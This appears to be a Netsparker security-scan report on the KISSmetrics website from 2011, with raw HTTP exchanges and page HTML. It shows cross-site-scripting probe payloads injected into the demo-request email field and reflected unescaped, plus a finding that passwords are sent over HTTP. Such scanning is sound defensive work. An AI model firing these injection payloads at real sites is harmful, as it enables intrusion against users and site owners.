<!DOCTYPE html><html> <head> <title>Request a Demo - KISSmetrics</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav active"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Request a Demo</h2> <p>Want to see what KISSmetrics can do for you? Fill out the form below and we&rsquo;ll get back to you to schedule a demo.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup/enterprise" method="post" id="enterprise_signup_form"> <h3>KISSmetrics demo request</h3> <p>Enter your information below and one of our KISSmetrics team members will contact you.</p> <hr class="thin" /> <fieldset> <p class="half"> <label for="request[first_name]">First name:</label> <input type="text" class="text" name="request[first_name]" value="Smith" /> </p> <p class="half"> <label for="request[last_name]">Last name:</label> <input type="text" class="text" name="request[last_name]" value="Smith" /> </p> <p class="clear half"> <label for="request[company]">Company:</label> <input type="text" class="text" name="request[company]" value="3" /> </p> <p class="half"> <label for="request[company_size]">Company size:</label> <select name="request[company_size]"><option value="1 to 5 people" selected="selected">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="request[url]">Company website:</label> <input type="text" class="text" name="request[url]" value="3" /> </p> <p class="half"> <label for="email">Email address:</label> <input type="text" class="text" name="request[email]" value="'" ns= netsparker(0x0006C3) " /> <span class="error">Email does not appear to be valid</span> </p> <p class="half"> <label for="phone">Telephone number:</label> <input type="text" class="text" name="request[phone]" value="3" /> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p class="clear"> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#enterprise_signup_form').submit();} return false" class="blue button with_arrow">Let&rsquo;s talk</a> </p> </fieldset> </form> </div><!-- /.col --><div class="trial col side"> <p>We&rsquo;ve got a bunch of really smart customers, who are using KISSmetrics to get even smarter.</p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p class="buttons"><a href="#" onclick="$('#forgot_form').submit(); return false;" class="blue button with_arrow">Recover password</a> </form> </div> </div> </div> </div> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script src="/javascript/external.1669.js" type="text/javascript"></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape(&q..
- /signup/enterprise

/signup/enterprise

https://www.kissmetrics.com/signup/enterprise

Parameters

Parameter Type Value
request%5Bfirst_name%5D POST Smith
request%5Blast_name%5D POST Smith
request%5Bcompany%5D POST 3
request%5Burl%5D POST 3
request%5Bemail%5D POST '" ns= alert(0x0006C5)
request%5Bphone%5D POST 3

Request

POST /signup/enterprise HTTP/1.1
Referer: https://www.kissmetrics.com/signup/enterprise
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 179
Expect: 100-continue
Accept-Encoding: gzip, deflate

request%5Bfirst_name%5D=Smith&request%5Blast_name%5D=Smith&request%5Bcompany%5D=3&request%5Burl%5D=3&request%5Bemail%5D=%27%22%20ns=%20netsparker(0x0006C5)%20&request%5Bphone%5D=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 21:05:34 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
Content-Length: 4882
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Request a Demo - KISSmetrics</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav active"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Request a Demo</h2> <p>Want to see what KISSmetrics can do for you? Fill out the form below and we&rsquo;ll get back to you to schedule a demo.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup/enterprise" method="post" id="enterprise_signup_form"> <h3>KISSmetrics demo request</h3> <p>Enter your information below and one of our KISSmetrics team members will contact you.</p> <hr class="thin" /> <fieldset> <p class="half"> <label for="request[first_name]">First name:</label> <input type="text" class="text" name="request[first_name]" value="Smith" /> </p> <p class="half"> <label for="request[last_name]">Last name:</label> <input type="text" class="text" name="request[last_name]" value="Smith" /> </p> <p class="clear half"> <label for="request[company]">Company:</label> <input type="text" class="text" name="request[company]" value="3" /> </p> <p class="half"> <label for="request[company_size]">Company size:</label> <select name="request[company_size]"><option value="1 to 5 people">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="request[url]">Company website:</label> <input type="text" class="text" name="request[url]" value="3" /> </p> <p class="half"> <label for="email">Email address:</label> <input type="text" class="text" name="request[email]" value="'" ns= netsparker(0x0006C5) " /> <span class="error">Email does not appear to be valid</span> </p> <p class="half"> <label for="phone">Telephone number:</label> <input type="text" class="text" name="request[phone]" value="3" /> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p class="clear"> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#enterprise_signup_form').submit();} return false" class="blue button with_arrow">Let&rsquo;s talk</a> </p> </fieldset> </form> </div><!-- /.col --><div class="trial col side"> <p>We&rsquo;ve got a bunch of really smart customers, who are using KISSmetrics to get even smarter.</p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p class="buttons"><a href="#" onclick="$('#forgot_form').submit(); return false;" class="blue button with_arrow">Recover password</a> </form> </div> </div> </div> </div> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script src="/javascript/external.1669.js" type="text/javascript"></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost..
Password Transmitted Over HTTP

Password Transmitted Over HTTP
1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.

Classification

OWASP A9 PCI v1.2-6.5.9 PCI v2.0-6.5.4 CWE-311 WASC-04
- /privacy

/privacy CONFIRMED

http://www.kissmetrics.com/privacy

Form target action

/login

Request

GET /privacy HTTP/1.1
Referer: https://www.kissmetrics.com/terms
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:38:09 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>KISSmetrics Privacy Policy</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="wrap"> <h2>KISSmetrics Privacy Policy</h2> <hr /> <p>Space Pencil, Inc., aka KISSmetrics, ("<b>KISSmetrics</b>" or "<b>we</b>" or "<b>our</b>"), makes available a service that enables a website operator to have collected and tracked certain data and information regarding the characteristics and activities of visitors to websites owned or controlled by the website operator or operated by the website operator on behalf of a third party and to view certain analytical reports based on such data and information (the "<b>Service</b>"). A website operator that desires to use the Service must execute a separate online agreement with KISSmetrics (a website operator that executes such an agreement, a "<b>KISSmetrics Customer</b>"). Under such agreement, KISSmetrics grants the KISSmetrics Customer a license to use certain software code that, when installed on a website, collects and track certain data and information regarding the characteristics and activities of visitors to website (collectively, "<b>Website Visitor Data</b>").</p> <p>KISSmetrics provides this Privacy Policy to inform you of our policies and procedures regarding the collection, use and disclosure of personal information that we receive from you. This Privacy Policy may be updated from time to time. We will notify you of any material changes by posting the new Privacy Policy on the KISSmetrics website (the "Site"). You are advised to consult this policy regularly for any changes.</p> <p>This Privacy Policy applies only to information that KISSmetrics Customers provide to us during their registration with KISSmetrics as a KISSmetrics Customer and their creation of a KISSmetrics Customer account and in conjunction with their access to and use of the Service. This privacy policy does not apply to any Website Visitor Data that KISSmetrics may collect, obtain or access in connection with operating the Service.</p> <p>As used in this policy, the terms "using" and "processing" information include using cookies on a computer, subjecting the information to statistical or other analysis and using or handling information in any way, including, but not limited to collecting, storing, evaluating, modifying, deleting, using, combining, disclosing and transferring information within our organization or among our affiliates within the United States or internationally.</p> <h3>Information Collection and Use</h3> <p><i>Personally Identifiable Information.</i></p> <ul> <li>When you register with us through the Site, as a KISSmetrics Customer, we will ask you for personally identifiable information. This refers to information about you that can be used to contact or identify you. Personally identifiable information includes, but is not limited to, your name, phone number, credit card or other billing information (if applicable), email address and home and business postal addresses. We use your personally identifiable information mainly to provide the Service and administer your inquiries.</li> <li>We also collect other non-identifying information that you provide as part of registration (e.g., without limitation, zip code (on its own) and individual preferences).</li> <li>We use your personally identifiable information (in some cases, in conjunction with your non-identifying Information) mainly to provide the Service, complete your transactions, and administer your inquiries.</li> <li>Certain non-identifying Information would be considered a part of your personally identifiable information if it were combined with other identifiers (for example, combining your zip code with your street address) in a way that enables you to be identified. But the same pieces of information are considered non-identifying Information when they are taken alone or combined only with other non-identifying information (for example, your viewing preferences). We may combine your personally identifiable information with non-identifying Information and aggregate it with information collected from other KISSmetrics Users (defined below) to attempt to provide you with a better experience, to improve the quality and value of the Service and to analyze and understand how our Site and Service are used. We may also use the combined information without aggregating it to serve you specifically, for instance to deliver a product to you according to your preferences or restrictions.</li> <li>We also use your personally identifiable information to contact you with KISSmetrics newsletters, marketing or promotional materials and other information that may be of interest to you. If you decide at any time that you no longer wish to receive such communications from us, please follow the unsubscribe instructions provided in any of the communications or update your "user preferences" information. (See "<b>Changing or Deleting Information</b>," below.)</li> </ul> <p><i>Log Data.</i> When you visit the Site, whether as a KISSmetrics Customer or a non-registered user just browsing (any of these, a "<b>KISSmetrics User</b>"), our servers automatically record information that your browser sends whenever you visit a website ("<b>Log Data</b>"). This Log Data may include information such as your computer’s Internet Protocol 